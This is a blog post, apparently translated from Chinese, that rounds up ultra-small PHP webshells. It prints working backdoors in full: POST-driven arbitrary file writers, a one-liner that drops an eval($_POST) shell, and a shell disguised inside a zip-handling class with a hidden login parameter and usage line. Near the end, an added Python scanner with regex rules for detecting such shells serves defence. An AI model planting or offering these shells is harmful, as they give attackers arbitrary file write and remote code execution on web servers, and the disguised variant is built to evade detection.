A roundup of ultra-small PHP webshells (for those hunting for backdoors)


Posted in PHP on May 05, 2012

Author: spider
Here is my own ultra-small PHP webshell

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

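Last night I was bored and read some PHP tutorials, and found that PHP really is quite powerful! Along the way I wrote a small PHP webshell.
The code is pasted directly below.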
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

Backdoor that drops a PHP one-liner webshell
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

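Once this is accessed, it generates jb51.php in the current directory, a one-liner webshell with the content <?eval($_POST[jb51]);?>)?> and the password jb51

Latest detection-evading PHP webshell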
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
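// Extract the entire archive
// Calling Extract directly causes path problems; this function first gets the file info from the list and creates all directories, and only then runs Extract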
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

Usage: xxx.php?zxzgcn=login
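
For the backdoor hunting the title refers to, the samples above share a few traits that can be checked statically: request data passed to eval, a request parameter used as the fopen path, request data written to a file, and a request-parameter gate like the one in the last sample. The following scanner is an added example, not code from the original post; the rule names, the file extensions and the sample strings are this example's own assumptions, and the rules are heuristics that will miss obfuscated variants.

```python
import os
import re

REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["
# Heuristic rules modelled on the samples above (rule names are this example's own).
RULES = {
    "eval-of-request-data": re.compile(r"\b(?:eval|assert)\s*\(\s*" + REQ, re.I),
    "open-request-path": re.compile(r"\bfopen\s*\(\s*" + REQ, re.I),
    "write-request-data": re.compile(
        r"\b(?:fwrite|fputs|file_put_contents)\s*\([^;]*" + REQ, re.I),
    "request-param-gate": re.compile(
        r"\bif\s*\(\s*\$_(?:GET|REQUEST)\s*\[[^\]]+\]\s*==\s*['\"]", re.I),
}

def scan_source(text):
    """Return [(line_number, rule_name)] for every rule hit in PHP source."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        hits += [(no, name) for name, rx in RULES.items() if rx.search(line)]
    return hits

def verdict(text):
    """'high': request data is executed, or picks both the path and content of a write."""
    names = {name for _, name in scan_source(text)}
    if "eval-of-request-data" in names:
        return "high"
    if {"open-request-path", "write-request-data"} <= names:
        return "high"
    return "review" if names else "clean"

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and return {path: verdict} for files that are not clean."""
    out = {}
    for d, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(exts):
                p = os.path.join(d, f)
                with open(p, encoding="latin-1") as fh:  # latin-1 never fails to decode
                    v = verdict(fh.read())
                if v != "clean":
                    out[p] = v
    return out

# Constructed samples: lines shaped like the writers above, and a benign logger.
WRITER = "$fp = @fopen($_POST['file'],'wb');\necho @fwrite($fp,$_POST['text']) ? 'ok' : 'no';"
GATED = "if($_GET['k']=='login'){\n" + WRITER + "\n}"
BENIGN = "$fp = fopen('/var/log/app.log','a');\nfwrite($fp, date('c'));"

if __name__ == "__main__":
    for name, src in (("writer", WRITER), ("gated", GATED), ("benign", BENIGN)):
        print(name, verdict(src), scan_source(src))
```

A "review" verdict (for example a parameter gate on its own) is common in legitimate code and only means the file deserves a look; compare flagged files against a known-good copy of the application before acting.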